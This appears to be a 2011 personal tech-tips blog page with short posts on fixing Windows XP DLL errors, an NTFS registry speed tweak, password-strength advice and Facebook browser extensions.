Want to get rid of those DLL error messages on startup or upon opening applications? Ever had XP DLL errors that you just can’t remove in your system? You might be putting your PC into more serious trouble if you keep ignoring these warnings. You don’t have to be a computer geek to figure things out with the help of these basic guides.

XP DLL errors commonly occur on startup, usually while loading applications. Software loading might be interrupted by a warning message, indicating the missing or corrupted file that is necessary to run the program. These errors occur due to a number of reasons. First, the DLL file might be corrupted due to faulty installation that accidentally replaced the working DLL files with a corrupted one. Second, when one of the applications sharing a common DLL file with other programs is uninstalled, there is a big chance that the shared DLL file might be accidentally uninstalled, too; thus, the remaining applications that need this file might not work properly. Next, XP DLL errors commonly occur on virus and malware attacks. These harmful applications can automatically and independently alter or replace working DLL files, thus causing programs to be faulty and corrupted.

The basic step to get an overview of where the problem might be is to run your PC under Safe Mode. You can select this from boot options that will appear when you press F8 on system startup. If you have successfully entered Safe Mode, you can make a few safe changes by restoring your computer to an earlier time, when the error was still not visible. This feature can be found in Start Menu >> Accessories >> System Tools >> System Restore.

If a DLL error occurs in a specific DLL file only, this can be resolved by reinstalling it. Secure an updated version of the missing DLL file and reinstall it carefully. You can also copy working DLL files from another computer, just make sure that it is compatible with your installed program.

Also, if the error appears after you have improperly uninstalled programs, run a clean reinstallation so that the system can properly coordinate DLL files with other applications requiring it. . Then, uninstall it once again and don’t forget to leave all associated DLL files intact.

If XP DLL errors appear during launching applications, these could be due to faulty installation of programs. It is recommended that you uninstall the program first and run a registry cleaner that will delete all the entries, both the working and the corrupted, from your Windows Registry. You can do this by installing Registry Cleaners that will scan your system for incorrect registry entries and invalid file paths. Then, do a quick and clean reinstallation of the faulty software to remove the error.

Keep your PC free from XP DLL errors by running a regular antivirus scan. You can also install registry cleaner software that can eliminate registry problems such as invalid file paths, incorrect registry entries and missing or corrupted DLL files. This can keep viruses and malwares away so that you can maintain a clean and virus-free PC while doing away with all these annoying DLL errors.

NOTE: THIS IS ONLY A EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

FROM:KRUNAL UPADHYAY

SPEED UP YOUR PC IN NTFS FILE SYSTEM

Speed up your NTFS file system

1. Click Start and choose Run,

2. Type regedit,

3. Go to:

Run then type regedit:-
then Go to
HKEY_LOCAL_MACHINE>SYSTEM>CurrentControlSet>Control>FileSystem

4. Find item NtfsDisableLastAccessUpdate and give her a Value 00000001. If item don't exist make new DWORD and give her a name NtfsDisableLastAccessUpdate and Value 00000001.

5. Restart your computer


NOTE: THIS IS ONLY A EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

FROM:KRUNAL UPADHYAY

PASSWORD - CREATION AND USAGE ONLINE SAFETY AND SECURITY

Is your head swimming with the need to create a new password every time you want to use a new online service? Mine is. Are you like me and can’t remember what you had for breakfast let alone your password you created six months ago for the esoteric website that you want to visit only on the third thursday of May? Good to know we aren’t alone isn’t it. So let me help you generate secure passwords and then tell you how I shift the “technological” risk to a “physical” risk.

Let’s start with my messaging that I’ve been sharing for years, passwords should not be a word found in a dictionary. Doesn’t matter if the dictionary is English, French, Chinese, Russian or Swahili a word found in the dictionary can be broken by any number of the brute force password attack software packages available off the net with ease. (See Online Safety, USERIDs and PASSWORDs October 2009)

I recommend, 8-14 characters, with letters (mixed case), numbers and symbols. Here is an example of a strong password: s?9stATAS53E . Here is another example of a strong password: N3verU$eWords. In my opinion, both of these will provide similar protection from the brute force attack. So now that we have a strong password, how can we make sure we don’t undermine the strength of the password? Don’t use it more than once.


NOTE: THIS IS ONLY A EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

FROM:KRUNAL UPADHYAY

Monday, April 25, 2011

FACEBOOK NEW LOOK AND NEW EXPERIANCE.....

There are few things which could be done better with Facebook.
However, there are several extensions out there which can easily enhance your experience with Facebook. In this post, We will try and list out the extensions I use on Facebook to enhance my experience with it.

Beautify Facebook

Facebook Profile Beautifier
Tired of being forced on how you can view your profile without having the options to change colors or move widgets around? The Beautify Facebook extension will come in handy then.
The Beautify Facebook extension allows you to change the background for Facebook, apply transparency to content and more. It also allows you to tweak Facebook by allowing you to hide requests, Advertisements and more.
It also provides you with handy shortcuts for accessing frequently used pages. For example, you can use the Shift + h shortcut key to quickly go to the Facebook homepage from any other page, or Shift + p to go to your profile orShift + i to to your inbox and so on. Overall, this extension is definitely worth trying out.
You will find the Options to edit the settings for Beautify Facebook extension when you visit Facebook.com.
Download Beautify Facebook CR Edit. If you want to try out other options check out Facebook Stylist andFacebook Themed extensions.


NOTE: THIS IS ONLY A EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

FROM:KRUNAL UPADHYAY